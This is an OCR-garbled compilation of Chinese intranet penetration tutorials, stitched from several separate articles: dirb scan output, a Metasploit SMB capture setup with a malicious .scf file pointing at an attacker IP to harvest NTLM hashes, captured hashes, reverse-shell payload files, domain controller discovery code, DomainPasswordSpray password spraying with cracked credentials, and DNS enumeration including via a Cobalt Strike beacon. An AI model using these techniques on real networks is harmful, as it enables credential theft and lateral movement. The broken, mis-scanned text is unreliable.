USER AGENT: Mozilla/5.0 (compatible; Googlebot/2.1; *http://www.google.com/bot,r 
COOKIE: ASP.NET SessionId-jennqviqmc2vws5504ggwu45 

SPEED DELAY: 100 milliseconds 


GENERATED WORDS: 1153 


---- Scanning URL: http://192.168.1.102/Manage/ ---- 
http://192.168.1.102/Manage//include/ (CODE:403|SIZE:218) 
http://192.168.1.102/Manage//news/ (CODE:403|SIZE:218) 
http://192.168.1.102/Manage//include (CODE:301|SIZE:159) 
http://192.168.1.102/Manage//images/ (CODE:403|SIZE:218) 
http://192.168.1.102/Manage//sys/ (CODE:403|SIZE:218) 
http://192.168.1.102/Manage//images (CODE:301|SIZE:158) 


+ + + + + t+ 


(!) FATAL: Too many errors connecting to host 
(Possible cause: EMPTY REPLY FROM SERVER) 


END TIME: Sun Feb 17 23:55:50 2019 
DOWNLOADED: 673 - FOUND: 6 


Wwordlist/srall# dirb http: //192.165.1.102/Manage ./DIR. txt -3 "Moz1l13/5,0 (compatable: Googlebot/2.1; +http: /Avww 
So4ggvu4 00 


u45 
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se» : Base URL to scan. (Use -resume for session resuming) 
st file(s)» : List of wordfiles. (wordfilei,wordfile2,wordfile3...) 


Go to next directory. 
Stop scan. (Saving state for resume) 
Remaining scan stats. 


=========== OPTIONS ======================== 
Jent string» : Specify your custom USER AGENT. 
se path as is. 
kie string» : Set a cookie for the HTTP request. 
tificate» : path to the client certificate. 
Fine tunning of NOT FOUND (404) detection. 
der string» : Add a custom header to the HTTP request. 
Use case-insensitive search. 
Print "Location" header when found. 
code»: Ignore responses with this HTTP code. 
tput file» : Save output to disk. 
oxy[:port]» : Use this proxy. (Default port is 1080) 
roxy username:proxy password» : Proxy Authentication. 






















+ Don't search recursively. 

+ Interactive recursion. (Asks for each directory) 

: Silent Mode. Don't show tested words. (For dumb terminals) 

+ Don't force an ending '/' on URLs. 

susername: password» : HTTP Authentication. 

+ Show also NOT FOUND pages. 

+ Don't stop on WARNING messages. 

extensions» / -x «exts file» : Append each word with this extensions. 
smillisecs» : Add a milliseconds delay to not cause excessive Flood. 


============= EXAMPLES ======================= 

rb http://url/directory/ (Simple Test) 

rb http://url/ -X .html (Test files with '.html' extension) 

irb http://ur1/ /usr/share/dirb/wordlists/vulns/apache.txt (Test with apache.t 
rb https://secure url/ (Simple Test with SSL) 
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DIRB. v2.22 
By The Dark Raver 


dirb «url base» («wordlist. file(s)»] [options] 
NOTES 


_base> : URL to scan. (Use -r 1 
«wordlist file(s)» : List of wordfiles. (wordfilel,wordfile2.wordfile3...) 


HOTKEYS = 
> GO to next directory. 
> Stop scan. (Saving state for resume) 
> Remaining scan stats. 


OPTIONS 
a jJ» : Specify your custom USER AGENT. 
je path as is. 
iKie string» : Set a cookie for the HTTP request. 
-E «certificate» : path to the client certificate. 
f ; Fine tunning of NOT FOUND (404) detection. 
Add a custom header to the HTTP request. 
sitive search. 
; Print "Loca " header when found. 
«nf cade»: Ignore responses with this HTTP code. 
Q file» : Save output to disk. 
(Default port is 1080) 
: Proxy Authentication. 


; Interactive recurs ; 
Silent Mode. Don't sho 
Don't force an ending '/' on URLs. 
name:password» : HTTP Authentication. 
w alsa NOT FOUND pages 
Don't stop on WARNING m 
ensions» / -x «exts fi Append each word with this extensions. 
illisecs> : add a milliseconds delay to not cause ex ve Flood, 


; Pieris Test} 
http: /ur - .html (Test files with '.html' extension) 

http: //url/ He T aer fyordlists/vulns/apache.txt (Test with apache.txt wordlist) 
https: //secure_url/ (Simple Test with SSL) 
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CF 做 目标 内 网 信息 搜集 第 二 季 0 


称 为 Switching Controller Foudation， 交 换 控 制 功能 单元 ， 既 Windows 资 源 管 理 器 命令 文 


3.1.2 Windows 7 


1 .119 Windows 2003 
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msf auxiliary(server/capture/smb) » show options 


Module options (auxiliary/server/capture/smb) : 





Name Current Setting Required Description 

CAINPWFILE no The local filename to store the hashe 
CHALLENGE 1122334455667788 yes The 8 byte server challenge 
JOHNPWFILE  micropoor.ico no The prefix to the local filename to, 
SRVHOST 0.0.0.0 yes The local host to listen on. This mus 
SRVPORT 445 yes The local port to listen on. 


Auxiliary action: 


Name Description 


Sniffer 


msf auxiliary(server/capture/smb) » ifconfig |grep 192.168 
[*] exec: ifconfig |grep 192.168 


inet 192.168.1.5 netmask 255.255.255.0 broadcast 192.168.1.255 
msf auxiliary(server/capture/smb) » exploit 
[^] Auxiliary module running as background job 6. 


*] Started service listener on 0.0.0.0:445 
] Server started. 


nsf auxiliary (server ‘capture ’smb) > show options 


Module options (auxillary/server/capture/s 
Current Setting Ri 


INPWFILE 
CHALLENGE 112 455667788 
JOHNPWFILE  micropoor.ico j name to store the h in John format 
SRVHOST e . This st be ana ss on the local machine or 0.0.0.0 
RYPORT Tr 


Auxiliary action: 


inet 192.1 n « 255.255.255.0 broadcast 192 
msf auxilia ar /captu > exploit 
background job O. 


Started service listener on 0,0.0.0:445 
Server started. 





1130 









ps 
ET: 
党 efiare 为 内 网 中 文件 共享 文件 来 。 在 实战 中 多 为 内 网 安装 程序 共享 文件 夹 。 


share 
资源 注释 
GEN 默认 共享 
E:N 默认 共享 
C: NWINDOWS 远程 管理 
远程 IPC 





E:Nshare 


: \WINDOWS 
ure IPC 


E: \share 


he SER FEY Micropoor.sc Xit, 内 容 如 下 : 
其 中 192.168.1.5 为 攻击 机 IP 






[She11 ] 
Command-2 
IconFile-NX192.168.1.5Nmicropoor.ico 
{Taskbar ] 

mand=ToggleDesktop 










"8 


as 


ropoor.scf. | 


y 


[Shell] 


Conmand=2 
IconFile=\\192.168.1.5\micropoor.ico 
[Taskbar] 


Cormand-TodggleDesktop 


E 内 网 Windows 7 访问 共享 : 
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€» 5 yw > 网 络 - 192.168. 1.119 9 v share = 
组 织 ov — 
a AJ 
X eR 修改 日 其 类 型 
Ex T Micropoor 2019/2/2 23:51 Windows Explor 
a 桌面 d 这 Micropoor_rev_x64_msi_53. msi 2019/1/18 14:38 Windows Instal... 
最 近 访 问 的 位 轩 | : 
$ Micropoor rev x85 dll. dll 2019/1/20 11:19 应 用 程序 扩展 
E E] Micropoor_url_dll. hta 2019/1/21 11:30 HTML 应 用 程序 
Rum rev. inf 2019/1/20 23:46 ”安装 信息 
s EH * rev x85 53 exe. exe 2019/1/18 20:44 应 用 程序 
5 文档 
= 
s BR 


内 网 Windows 2003 访问 共享 : 






p \A192. 168. 1. 119\share 


文件 四 RBO SEW bmw IAD Hho — 


JAB ~ iei 搜索 MK | XO Ee 


地 址 @) fz WIS yr li share sd 2 
EH < 修改 日 






mi cropoor | 1 KB Windows Explore... 2019-2 
JNM cr opoor rev x64 msi 5.. 156 KB Windows Install... 2019-1 
3JNi cropoor rev x86 dll. al 5 KB 应 用 程序 扩展 2019-1 
CMieropoor url a1. hta 18 KB HTML Application 2019-1 
prev. inf 1 Kb ”安装 信息 2019-1 
CUrev x88 53 exe. exe T3 KB. 应 用 程序 2019-1 


攻击 机 : 


获取 目标 内 网 机 器 IP， 时 间 ，NTHASH，USER，DOMAIN，NT_CLIENT_CHALLENGE 等 敏感 信 
息 。 以 上 敏感 信息 拓扑 内 网 横向 移动 以 及 了 解 目 标 内 网 工作 时 间 ， 行 为 习惯 等 将 会 提供 强大 的 情报 
保障 。 
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è captured from 192.168.1.119:1129 - 192.168.1.119 
ator DOMAIM:WINO3X64 OS:Windows Server 2003 R2 3790 Service Pack 2 LM: 


f 
ture - eee has h esate from 192, 168.1. Tie 1131 - 192.168,.1.119 captured, ignoring... 
,ptured = 2019-02-02 11:02:03 -0500 
e Captured from 192.168.1.119:1131 - a 
rator DOMAIN;WINO3X64 OS:Windows Server 2003 R2 Service Pack 2 LM: 


4df7a9e1478f3cfa64bd9e250f57a764a0eef36 
- Empty hash captured from 192.168.1.11 
: 2 03 -0500 
rom 192.168.1.119:1133 - 
OS:Windows Server 2C : ervice Pack 2 LM: 


2.168.1.119 captured, ignoring. ... 


78f3cfa64bd9e250f57a764a006136 

sh captured from 192.168.1.119:1135 - 192.168.1.119 captured, ignoring ... 
- 03 -0500 

Captu 
ator DOMAIN: WINOSX64 OS: ws Sery 2 Service Pack 2 LM 


bled 
2bbOaf00 afdfo8 
OO9fSfcOdcelObbd401 3ab578c 30f 73a 3d9c 00 
-0500 


ptured from 192. 
IN;John-PC 0S: LM: 


3efdf84d19491e3436 
CHALLENGE ; 0101000000000000d 750c 2dc 10bbd401d24dbb4462608d4c 00000000020090000000060000000000 





深入 利用 待 未 来 的 季 中 会 继续 补充 。 
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内 网 漏洞 快速 检测 技巧 
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域 环境 信息 搜集 
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ə Directory Domain Services - 获取 绒 控 信息 
简介 


的 域 环 境 下 ， 获 取 域 控 的 信息 有 很 多 种 ， 但 是 在 此 之 前 都 是 以 经 验 来 判定 的 。 
文档 的 API 从 未 接触 过 ， 因 此 想 多 扩展 一 下 知识 面 。 


tp S//docs. microsoft com/zh-cn/windows/desktop 'ap/ ad/ 


Bsy/blog.csdn.net/jsd2honey/article/details/54340439 


ome gum 


客户 端 发 起 net logon 服务 会 运行 DsGetDcName 这 个 APl。 

DsGetDcName 就 会 从 客户 端 收集 DNS 和 site 的 信息 。 

Net logon 会 根据 IP 地 址 找到 相应 的 DNS 服务 器 ， 并 发 送 一 个 DNS Query 的 数据 包 ， 查 询 
内 所 有 DC 的 SRV 记 录 和 A 记 录 。 

DNS 服务 器 会 返回 一 个 response 数 据 包 ， 里 面包 含 site 内 所 有 DC 的 一 张 表 格 。 如 果 DNS 服 
返回 这 个 数据 包 ， 那 么 locate DC 就 失败 了 。 

然后 客户 端 的 netlogon 就 根据 这 张 表格 给 每 台 DC 都 发 送 一 个 Query 数据 包 。 如 果 有 多 台 

都 给 客户 端 返回 response 的 数据 包 ， 那 么 客户 端 以 最 先 返 回 response 为 准 ， 即 客户 端 成 功 
ate 到 这 台 DC。 但 是 如 果 没有 DC 返回 响应 数据 包 ， 那 么 locate DC 也 会 失败 。 


ComputerName, 
DomainName, 
*DomainGuid, 

SiteName, 

: Flags, 

PDOMAIN CONTROLLER INFOA *DomainControllerInfo 


的 介绍 都 在 文档 中 。 
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0x03 获取 域 控 信 息 


我 写 了 一 个 例子 ， 获 取 域 控 的 地 址 、GUID 等 信息 ， 都 保存 在 Domaincontrollerinfo : 


// ConsoleApplicationi.cpp : 定义 控制 台 应 用 程序 的 入 口 点 。 
Th 


#include "stdafx.h" 

#include «Windows.h- 

#include <DsGetDC.h> 

#include <Lm.h> 

#pragma comment(lib, "NetApi32.lib") 


int main() 
{ 
PDOMAIN CONTROLLER INFO dcInfo; 
DWORD ret = DsGetDcName( 
NULL, 
NULL, 
NULL, 
NULL, 
DS KDC REQUIRED, 
&dcInfo 
); 
if (ret == ERROR_SUCCESS) { 
GUID * dc guid = &dcInfo->DomainGuid; 


wprintf(L"DomainControllerName : %s ^n ", dcInfo-»DomainControllerName); 
wprintf(L"DomainControllerAddress : %s Nn ", dcInfo-»DomainControllerAdc 
wprintf(L"DomainGuid : %x-%x-%x-%x Nn", dc guid-»Datai, dc guid-»Data2, 


NetApiBufferFree(dcInfo); 


} 
else { 

wprintf(L"Error : %d \n ", GetLastError()); 
} 


system(" pause"); 
return 0; 





PDOMAIN CONTROLLER INFO 的 信息 都 在 这 里 : 
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BinGuid Ox00dO4dBc(TEGOAATI-FD22-4DGD-B686-774ABSEGO4Od] — — » 








trollerName OxOOdO4db L" 
itrollerAddress OxQOdO4df4 L^ 
ontrollerAddressType 1 
č 
ime 
37 1501 





04e58 L'Default-First-Site-Name 

4e88 L'Default-First-Site-Name 

O4df4 L^ 68.117.169" 

O4dbO Lv IN-JMA6E42K84B.payloads.online" 
dO4dÉc (TEGOAA11-FD22-4D9D-B689-7744B9E60494] 








iinControllerAddress 
entrollerName 












E 


意 的 是 ，DC 的 这 些 API 都 需要 调用 NetApis2.lib , JH BÉ dsgetdc.h : 


Jirements 


um supported client Windows Vista 

un  u- server Windows Server 2008 
Windows 

dsgetdc.h 


NetApi32 lib 


NetApi32 dll 
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nem 


2ff&1c (0x00d04489 [DomainControllerNamez Ox00dO4dbO L" A\AWIN-JMASE42K84B, payloads.oniine” D: DOMAI 


GUID * 


OxC0d04485 (DomainControllerNamez O00 dO4dbO L^: WIN-JMASE42KE4B, payloads.online" DomainContr DOMAI 


Q ~ wchar t 
Q > wchart 
unsignec 
.GUID 
ed chat] 
Q > wehart 
unsignec 
Q © wchart 
Q ~ wchart 
Q ~ wehart 
Q ~ wchart 
-GUID * 
unsignes 


Windows 域 渗透 - 用 户 密码 枚 举 


0x00 前 言 


在 进行 Windows 域 渗透 的 时 候 ， 面 对 庞大 的 用 户 账 号 ， 不 知 该 从 何 下 手 ， 扫 描 网 络 服务 有 怕 搞 出 大 
动静 ， 肿 么 办 呢 ? 


0x01 Powershell 


目前 已 经 有 很 多 Powershell 集 合 脚本 ， 用 于 域 渗透 简直 舒 爽 


今天 推荐 一 款 名 字 叫 DomainPasswordSpray.ps1 的 脚本 ， 主 要 原理 是 先 来 抓 取 域 用 户 账号 ， 然 后 指 
定 密码 字典 进行 域 认 证 。 认 证 通过 的 就 是 密码 正确 的 了 。 





je with Fine Gra 


E LE 


235523553 


BES 


BEGGeR ees 


GitHub 项 目地 址 : https://github.com/dafthack/DomainPasswordSpray 
由 于 作者 的 脚本 有 一 个 小 瑕 疫 ， 故 此 我 改 了 一 下 ， 避 免 抛 出 了 一 些 错误 。 
优化 后 的 地 址 : http://payloads.online/scripts/invoke-DomainPasswordSpray.txt 


0x02 参数 说 明 


在 代码 的 开头 就 已 经 有 介绍 了 ， 我 简单 汉化 一 下 。 

描述 ; 该 模块 主要 用 于 从 域 中 收集 用 户 列表 。 

参数 : ”Domain 指定 要 测试 的 域名 

参数 : ”RemoveDisabled 尝试 从 用 户 列表 删除 禁用 的 账户 

参数 : ”RemovePotentialLockouts 删除 锁定 账户 

参数 ; ”UserList 自 定义 用 户 列表 (字典 )。 如 果 未 指定 ， 这 将 自动 从 域 中 获取 
参数 : ”password 指定 单个 密码 进行 口令 测试 


SX: ”passwordList 指定 一 个 密码 字典 
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e 将 结果 保存 到 某 个 文件 
NEL C dE 后 继续 枚 举 ， 不 询问 


t-DomainUserList 


或 中 收集 用 户 列 表 。 
t-DomainUserList -Domain 域名 -RemoveDisabled -RemovePotentialLockouts | 


-Encoding ascii userlist.txt 


id 域 "域名 "中 的 用 户 列 表 ， 包 括 任何 未 被 禁用 且 未 接近 锁定 状态 的 帐户 。 它 会 将 结果 写 
ist.txt 文件 中 


Invoke- DomainPasswordSpray -Password Winter2016 


会 从 域 环境 中 获取 用 户 名 ， 然 后 逐个 以 密码 winter2016 进行 认证 枚 举 


nvoke-DomainPasswordSpray -UserList users.txt -Domain 域名 -PasswordList 


pt xt -OutFile sprayed-creds.txt 


会 从 users .txt 中 提取 用 户 名 ， 与 passlist.txt 中 的 密码 对 照 成 一 对 口令 ， 进 行 域 认 
E 录 成 功 的 结果 将 会 输出 到 sprayed-creds.txt 


C:\PS> Get-DomainUserList | Out-File -Encoding ascii userlist.txt 


Urrent domain is compatible with Fine-Grained Password Policy. 
Creating a list of users to spray... 
There appears to be no lockout policy. 


There are 8 total users found. 


Created a userlist containing 8 users gathered from the current user's domai 
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dh » 
C:NPS» t Ny | t t 
iminist 
€ r 
LN } 
at 
Hack 


webManager 


a 


密码 枚 举 


PS C: NUsersM iy ingzhe, PAYLOADS> Invoke-DomainPasswordSpray -Domain payloads, online -Password w!23456 -OutFile sprayed-creds. txt 
[*] Current domain is compatible with Fine-Grained Password Policy. 












[+] This might take a while depending on the total number of users 

l of 6 users tested2 of 6 users Lested3 of 6 users testedi*) SUCCESS! User:testiass Passsordiw!? 
4 of 6 users tested * | SEC User:sebManager word: w! 23456 

5 of 6 users tested! *] SUCCESS! User:dha Passwo: 156 

6 of 6 users tested 


PS C:\Wsers\liyingzhe. PAYLOADS> type . Nsprayed-creds, txt 
testPass:w!23456 


ap: C:\PS> Invoke-DomainPasswordSpray -Domain 域名 -Password w!23456 -OutFile 
sprayed-creds.txt 


输出 : 
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3 appears to be no lockout policy. 
wing disabled users from list. 


T are 6 total users found. 


txt 
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ent domain is compatible with Fine-Grained Password Policy. 


c! eating a list of users to spray... 


不 同 环境 下 域 dns 记 录 信 息 收集 方法 
导出 dns 信息 的 必要 性 


在 内 网 渗透 过 程 中 ， 内 网 信息 收集 是 内 网 横向 的 关键 ， 无 论 是 已 有 部 分 内 网 权限 的 情况 或 是 在 
内 网 渗透 初期 ， 快 速 了 解 目标 环境 架构 ， 对 靶 向 目标 精准 快速 "打击 "十 分 重要 。 


对 于 域 环 境 的 内 网 渗透 ， 域 内 都 会 有 内 部 dns 服务 器 ， 内 网 dns 信息 不 仅 包 含 了 域内 个 人 机 信 
息 ， 更 关键 的 是 包含 了 域内 所 有 注册 过 的 服务 器 信息 (web、 数 据 库 、 业 务 服务 )， 对 于 寻找 目标 有 较 
大 帮助 。 


大 多 数 情况 下 ， 内 网 web 服 务 器 直接 使 用 ip 地 址 访问 会 返回 默认 页 面 (如 iis 默 认 页 面 、apache 默 
认 页 面 )， 如 下 图 所 示 ， 这 是 因为 大 多 数 web 服 务 器 配置 了 虚拟 目录 ， 如 下 图 3、4， 不 同 目录 对 应 不 
同 的 域名 ， 访 问 不 同 域名 跳 转 到 不 同 的 页 面 ， 内 网 web 服 务 器 很 多 也 是 同样 的 情况 ， 内 网 域名 类 似 


xxserver.mydomain.local. 







Welcome Tervetuloa 


Ao6po 


noxa^sotat» 





图 1 lis8.5 默 认 页 面 
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cj o eee är: 
Rie à p ex = 
pee Seui y Gnd nus N cat Docs N Ket Tools % Explot-D5 | 


sien 


Apache2 Ubuntu Default Page 











It works! 


Mault welcome page used to test the correct operation of the Apache2 server after installation on 
ims. It is based on the equivalent page on Debian, from which the Ubuntu Apache packaging is 

| «an read this page, it means that the Apache HTTP server installed at this site is working properly, 
ce this file (located at /var/vevw/html/index html) before continuing to operate your HTTP 


al user of this web site and don't know what this page is about, this probably means that the site 
allable due to maintenance. If the problem persists, please contact the site's administrator, 


对 应 jache2 default configuration is different from the upstream default configuration, and split into 
TRU 

L'optimized for interaction with Ubuntu tools. The configuration system is fully documented in 
p/doc/apache2/README.Debian.gz. Refer to this for the full documentation. Documentation for the 


self can be found by accessing the manual if the apache2-doc package was installed on this server. 
iration layout for an Apache? web server installation on Ubuntu systems is as follows: 


— 


图 2 Apache 默 认 页 面 
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图 3 lis 配 置 虚拟 目录 





MILES EE ^-^ 
LustonLog ogs 
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4 















j 


is 列表 信息 。 


d Lockup Zones 
amades.contess. com 
 conteso.com 


息 查 询 方法 


- DNS Manager 


Name 


图 4 Apache 配 置 虚 拟 目录 


芝 件 需 城 控 或 域内 dns 服务 器 权限 
Manager 是 域 控 或 dns 服 务 器 默认 安装 的 程序 ， 是 windows 域 名 管理 工具 ， 如 下 图 。 右 键 


msdes 

betes 

tcp 

udp 
DomamDnaloenes 
ForestOniZones 


(«arme às parent folder) 


i Game as parent folder) 


Type Data 


Start of Authenty SOA) 127], de! centoso com, h 


Name Server (NS dc! contosc com 





Ti mestre 











qM z ude | (tame as parent folder Host (A 2/14/20 
ME DemsinDrsZone. | | Sint! Hort (A 114/2012 
Lp C ForestDasZones pur Host iA static : 
leckup Zones DHCP! Host iA 2142012 
Points (PAM Host GA N22 
it Forwarders vep- Per Host (A static 
ut 
— Dnscmd 
E. 
需 条 件 : 需 域 控 或 域内 dns 服务 器 权限 
p^ 


: md(https://d 


部 分 服务 器 没有 默认 安装 dnscemd， 所 有 执行 之 后 会 出 现 以 下 情况 。 


fidmini 


此 需要 安装 dnscmd 命 令 ， 以 win2008(win7、win2008 R2 均 可 ) 为 例 ， 复 制 dnscmd.exe 至 
9Wssystem32 目 录 ， 复 制 dnscmd.exe.mui 至 C:WindowsSystem32en-US 目 录 。 


dnscmd 可 正常 执行 。 
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IC: Nisers Midninistrator?dnscmd 


<ServerNane >: 


IP address or host nane 


<Connand >: 


ZInfo 

Conf ig 
/EnunZones 
Z/Statistics 
ZClearCache 


Usage: DnsCnd <ServerNane > <Command> [4Connand Paraneters >] 


remote or local DNS server 
DNS server on local machine 


Get server information 

Reset server or zone configuration 
Enunerate zones 

Query/clear server statistics data 
Clear DNS server cache 


/VriteBackFiles Write back all zone or root-hint datafile ¢s> 
/StartScavenging Initiates server scavenging 

A\pUalidate Validate remote DNS servers 
ZResetListenfiddresses Set server IP addr s) to serve DNS requests 
/ResetForvarders 
/Zonelnfo 
*Lonehdd 
/ZoneDelete 
“Zone Pause ~~ Pause a zone 
/ToaneResune 
/ZoneRe load 
/ZoneVrite Back 


Set DNS servers to forward recursive queries to 
View zone information 

Create a new zone on the DNS server 

Delete a zone from DNS server or DS 


Resume a zone 
Reload zone from its database <file or DS?) 
Write back zone to file 





Dnscmd 常 用 命令 


1. 列 举 dns 服 务 器 区 域 


:sers Mdninistrator Desktopodnscmd . /enunzones 


i: 


AD-Donmain 
fiD-Forest 
AD~Donain 
fiD-Forest 


Cache 

Prinary 
Prinary 
Primary 


Secure 
Secure 


,nzdcs.rootkit.org 
rootkit.orq 
Trustfnchors 





2. 列举 当前 dns 服务 器 指定 区 域 详细 信息 。 
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inistratorWMDesktop?dnscnd . ¢zoneinfo rootkit.org 


Ada 


= BABEBB7C9?FIPABA 
© rootkit org 


| WINS 
Nbstat 


1 > AD-Domain 98800815 
ts. DN > DCerootkit .org,cn*Microsoft DNS, DC*DonainDnsZones 
otkit, DC*org 





3 列举 当前 dns 服务 器 ，rootkit.org 区 域 的 所 有 记录 
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:Nsers Midninistrator \Desktop>dnscnd. . 


rootkit .org 
0VU82813.rootkit.orq 


rarer reser res 


Ue (23671166) 688 A 


192.168.229.186 
Lf {:36711431 608 A 
3688 NS ova2813 
3688 SOA 0va2813 

988 688 864080 3688 

.nsdcs 3688 NS owa2013 rootkit .org. 

dc. tcp.Default-First- Site-Nane. sites 

13.rootkit.orq. 


“kerberos: tcp.Default-FPirst-Site-Nane. 
04a2013.rootkit.org. 


sites [© {!,:3671143) 668 SRU 


/zoneprint rootkit :org 


Tue Oct 22 08:83:44 2019 UTC 


192 .168.3.144 
-rootkit.org. 
-rootkit .org. hostnaster rootkit ,org. 229 


(4 (1,:3671143) 608 SRU 6 188 3268 oua20 


8 168 88 


“ldap. tcp.Default-First-Site-Nane. sites [1( :3671143] 688 SRU 


owa2B13. rootkit org. 
gc., tcp Ue 
‘kerberos. tcp (35105:36711431 6880 SRU 
kpassud. tcp (35 11523671143) 686 SRU 
idap. tcp [3515:3671143] 608 SRU 
kerberos. udp rn 600 SRU 


-kpassud. udp [1511:36711431 608 SRU 


1808 389 oua2813.rootkit.org. 


„idap. tcp. DonmainDnsZones (355 13671143) 6808 SRU 


Lorg. $ 
ForestDnsZones (45133671166) 688 A 


© {t,:3671143) 698 A 


123671143} 608 SRU @ 100 3268 owa2013. rootkit org. 


@ 1800 88 oua2013.rootkit.orq. 
B 180 464 owa2Bl3. rootkit org- 
B 188 389 owa2G13-. rootkit org. 
O 1886 88 oua2813.rootkit.org. 
8 188 464 owa2G13 rootkit .org. 


192.168.229.186 
192.168.3.144 


8 180 389 owa2813.rootki 


192.168.229.186 
192.168.3.144 


ldap. tcp.Default-First-Site-Nanc. sites.ForestDnsZones [ $:(1:36711431 6808 SRU 


100 389 oua28013.rootkit.org. 


.ldap. tcp.ForestDnsZones [35;:/.:36711431 688 SRU 


.org. 


)ua2013 3608 A 192.168.229.186 


3688 A 192.168.3.144 
PC-jerry Kit [3515,:3667593] 1208 A 
IPC-nicle-Kit [人 化 :36625931 1288 A 
pc-torndo-Kit (Æ {L:3667593] 1208 A 


Bru-Web-Kit [3 [73671145] 1208 A 


4. 在 当前 dns 服 务 器 列举 rootkit.org 区 域 相同 名 称 (官方 解释 为 枚 举 同一 名 称 的 记录 ) 的 dn 


@ 1686 389 owa2813.rootki 


192.168.3.75 


192.168 .3.76 


192.168.3.7? 


192.168.3.73 





..\AdninistratorNDesktop>Dnscnd - ZEnunRecords rootkit .org 


(2241,:36711661 600 A 192.168.229.186 

(14236711431) 600 A  192.168.3.144 

3688 NS owa2813 rootkit org. 

3688 SOA owa2G@13 rootkit .org. hostnaster.rootkit.org. 229 
aa 864886 3688 
i 3608 A 192.168.229.186 

3608 A 192.168.3.144 
sry Kit [3510:3667593] 1208.0  192.168.3.75 
le-Kit CE 4436675931 1208 A 192.168.3.76 
rndo-Kit 351,:3667593] 1280 A 192.168.3.27 
.þ-Kit (42 14,:3671145] 12808 A 192.168.3.73 


方法 三 使 用 Powershell 进 行 dns 信 息 查询 


Powershell dnsserver 是 微软 升级 代替 dnscmd 的 模块 。 


通过 powershell Get-Command -Module DnsServer， 如 下 图 


ers MidninistratorNDesktop?pouershell Get-Connand -Module DnsServer 


andT ype Nane ModuleNane 


Export -DnsSeruerIrustfnchor DnsServer 
fidd-DnsServerConditionalForuarderZone DnsServer 
fidd-DnsServerDirectoryPartit ion DnsServer 
fidd-DnsServuerForvarder DnsServer 
Add-DnasServerPrinaryZone DnsServer 
fidd-DnsServerResourccRecord DasServer 
fidd-DnsServerResourceRecordf DnsServer 
Add-DnsServerResource RecordARAA DnsServer 
fidd-DnsServerResourceRecordCNane DnsServer 
fidd-DnsServerResourceRecordDns Ke y DnsServer 
fidd-DnsServerResourceRecordDS DnsServer 
fidd-DnsServerResourceRecordMX DnsServer 
Add-DnsServerResourceRecordPtr DasServer 
fidd-DnsServerRootHint DasServer 
fdd-DnsServerSecondaryZone DnsServer 
fidd-DnsServerSigningKey DnsServer 
fidd-DnsServerStubZone DasServer 
Add-DasServerTrustAnchor DnsSeroer 
fidd-DnsServerZoneDelegation DasServer 
Clear~DnsServerCache DasServer 
Clear-DnsServerStatistics DnsServer 
ConvertTo—DnsServerPrinaryZone DasServer 
ConvertTo-DnsServerSecondargZone DnsServer 
Disable-DnsServerSigningKeyRollover DnsServer 
Enable-DnsServerS ign ingKe yRo llover DosServer 
Export -DnsSeruerDnsSecPublicKey DasServer 
Export -DnsSeruerZone DasServer 
Get -DnsServer DnsServer 
Get-DnsServerCache DnsServer 
Get-DnsServerDiagnostics DnsServer 
Get -DnsServerDirectoryPartition DosServer 
:et-DnsServerDnsSecZoneSetting DasServer 


Windows 2008 和 windows 2012 默 认 都 是 没有 安装 此 模块 的 ， 通 过 以 下 





powershell Import-Module Servermanager 
powershell Add-WindowsFeature 'DNS' 


如 下 图 ， 已 安装 完毕 


:NJsers Administrator>powershell fidd-VindousFeature 'DNS* 


uccess Restart Needed Exit Code . Feature Result 


Success 





查询 当前 dns 服务 器 存在 的 区 域 
Powershell Get-DnsServerZone 


'"ntLog X Sites X Beacon 192.168.229.19283728 X | Beacon 192.168,229,186@6744 X 


1/1«/ SD» PR /MS»« /Obj»« }s> 
on» powershell powershell Get-Gasserver Zone 
| tasked beacon to runo powet shell G6et-DnsServerZone 
t+] host called e, sent. 1139 bytes 
beacoa» powetshell Get-ÜnsServerZone 
lasked beacon to run: Get-Drnsserver Zone 
[*] received output 


ZoneName Zane lype IsAutoCreated  [slslnteqrated  IsReverseto Zone IsSigned 


msdcs.rootkit.orq Primary Fals false false 
8.in-addr.arpa Primary True False troe False 
127. in-addr arpa Primary True False True False 
355. in addr. arpa Primary true False True false 
tootkit.orq Primary false True false False 
IrustAnchors Primary False True False False 





从 当前 dns 服务 器 查询 指定 区 域 dns 详 细 信息 


Powershell Get-DnsServerResourceRecord rootkit.org 
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progress" R 
»S60588197« SAL NE /«Pls-l«7PIxePCO 104 


tet Dosser verlesoureeiiecord Y icslkiT org 
sent- 167 bytes 


Timelotive Recor uir 
307274 16:08: 
72i 1:08:06 B 1968 92. lll 
kit.org. 


1:00:06 
200706 
206: 96 i {8} {186 mea? G13. rootkit org. 
HORUM LOPtieell i768 mad 2013. roatkit.org.] 
100706 外 è teiriee 
*5:00:00 60:18: 8 

2819 5:06:00 68:18: 

#039 5:00:00 

2029 5:00:08 

7819; 18; 708 

2019 5:00: 

203973 T 

2819 " 160: 

2019 TE 190 

2039/38) :60:06 80:10:00 

7019/18; 520810 

7639 TUE 


168 
100 
260 
2019/10/21 17:06:00 98: :80 





使 用 完毕 后 ， 记 得 删除 模块 ， 命 令 如 下 
powershe!l remove-WindowsFeature 'DNS' 


执行 删除 命令 后 需要 服务 器 重启 ， 模 块 才能 完全 删除 。 


sers\fdministrator>powershell remove-WindowsFeature * DNS’ 


tart Needed Exit Code Feature Result 





方法 四 adidnsdump 
meat: 任意 域 用 户 账号 。 


Adidnsdump( 
BLLMNR Ee: 


域 中 dns 








Adidnsdump 可 在 windows、linux 环 境 下 使 用 ， 并 且 通 信 流 量 可 以 通过 socks 代 理 传 输 。 


ETE, 通常 内 网 域 环境 windows 机 器 较 多 ， 具 有 python 环 境 的 主机 较 少 ， 
dnsdump 经 常 是 在 socks 代 理 环 境 下 使 用 的 。 
党 用 命令 如 下 


查询 dns 区 域 
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Python dnsdump.py --print-zone -u domain\user -v dc-ip 


pato :-/Desktop/tools/adidnsdump-1.1.0/adidnsdump# python dnsdump.py =- prin 
t-zone -u rootkit\\alee -v 192.168.3.144 

Password: 

ii Connecting to host... 


[-} Binding to host 
219 Bind OK 
msdcs.rootkit.org, CN=MicrosoftDNS, DC=ForestOnsZones,DC=rootkit,0C=org 
| Found 1 domain DNS zones: 
msdcs.rootkit.org 
msdcs.rootkit.org, CN=MicrosoftDNS, DC=ForestDnsZones, 0C=rootkit,0C=org 
i Found 1 forest ONS zones: 
msdcs.rootkit.org 
DC-RootDNSServers,CN-MicrosoftDNS,CN-System,DC-rootkit,DC-org 
Found 1 legacy ONS zones: 
RootDNSServers 





查询 dns 详细 内 容 
Python dnsdump.py -r -u domain\user dc-ip 


